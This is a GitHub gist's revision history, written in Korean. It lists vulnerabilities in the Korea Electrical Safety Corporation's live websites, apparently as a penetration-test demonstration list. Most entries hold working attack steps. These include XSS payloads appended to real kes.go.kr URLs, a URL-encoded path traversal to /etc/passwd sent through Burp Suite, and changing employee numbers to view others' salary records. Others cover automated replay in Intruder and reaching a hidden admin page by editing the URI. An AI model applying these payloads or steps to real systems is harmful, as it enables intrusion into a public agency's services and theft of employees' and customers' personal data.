Last active 3 months ago

sehoon0519's Avatar sehoon0519 revised this gist 3 months ago. Go to revision

1 file changed, 16 insertions, 1 deletion

\354\240\204\352\270\260\354\225\210\354\240\204 \354\213\234\354\227\260 \353\252\251\353\241\235"

@@ -19,8 +19,23 @@ https://www.kes.go.kr/web/lay1/bbs/S1T157C159/A/1/view.do?article_seq=1583&cpage
19 19
20 20
21 21 기록물관리시스템-정보누출
22 + 메인페이지 소스 보기 (운영지침서)
23 +
22 24 경영정보시스템-불충분 권한검증
25 + 급여 조회시 사번 변경
26 +
27 +
23 28 경영정보시스템-자동화 공격
29 + 사번 변경 패킷을 intruder에 넣고 확인
30 +
31 +
24 32 KESCOIN-파일 다운로드
33 + 고객센터 > 수수료계산 > 안전관리수수료계산 > 이메일 발송 > 파일 다운로드 (pdf파일)
34 + 다운로드 패킷을 Burpsuite로 캡처 후 fileNm에 ../../../../../../.././../../etc/passwd를 모두 url 인코딩하여 전송
35 +
25 36 KESCOIN-불충분 권한검증
26 - 일반용점검업무시스템-관리자페이지 노출
37 + 시스템 관리 > 알림톡 템플릿 관리 > 8페이지 > 송신인 변경
38 +
39 +
40 + 일반용점검업무시스템-관리자페이지 노출
41 + 메인페이지에 히든속성확인 M_ADM으로 URI 변경

sehoon0519's Avatar sehoon0519 revised this gist 3 months ago. Go to revision

1 file changed, 16 insertions

\354\240\204\352\270\260\354\225\210\354\240\204 \354\213\234\354\227\260 \353\252\251\353\241\235"

@@ -1,7 +1,23 @@
1 1 대표홈페이지-불충분 권한검증
2 + sch_bbs_code=CCC00003&printList%5B%5D=3151620&bbscmtt_seq=
3 +
4 +
2 5 전기안전여기로-불충분 인증절차
6 + 로그인페이지 admin 계정
7 +
8 +
3 9 전기안전종합정보시스템-XSS
10 + https://www.kes.go.kr/web/lay1/bbs/S1T157C159/A/1/list.do
11 + ?%0a[][%27filter%27][%27constructor%27]([%27al%27,%27ert(1)%27].join(%27%27))()//
12 +
13 + https://www.kes.go.kr/web/lay1/bbs/S1T157C159/A/1/view.do?article_seq=1583&cpage=1&rows=10&condition=&keyword=
14 + %0a;al%5Cu0065rt?.(1)//
15 +
16 +
4 17 인재개발원홈페이지-정보누출
18 + 마이페이지 > 회원 정보
19 +
20 +
5 21 기록물관리시스템-정보누출
6 22 경영정보시스템-불충분 권한검증
7 23 경영정보시스템-자동화 공격

sehoon0519's Avatar sehoon0519 revised this gist 3 months ago. Go to revision

1 file changed, 10 insertions

\354\240\204\352\270\260\354\225\210\354\240\204 \354\213\234\354\227\260 \353\252\251\353\241\235" (file created)

@@ -0,0 +1,10 @@
1 + 대표홈페이지-불충분 권한검증
2 + 전기안전여기로-불충분 인증절차
3 + 전기안전종합정보시스템-XSS
4 + 인재개발원홈페이지-정보누출
5 + 기록물관리시스템-정보누출
6 + 경영정보시스템-불충분 권한검증
7 + 경영정보시스템-자동화 공격
8 + KESCOIN-파일 다운로드
9 + KESCOIN-불충분 권한검증
10 + 일반용점검업무시스템-관리자페이지 노출
Newer Older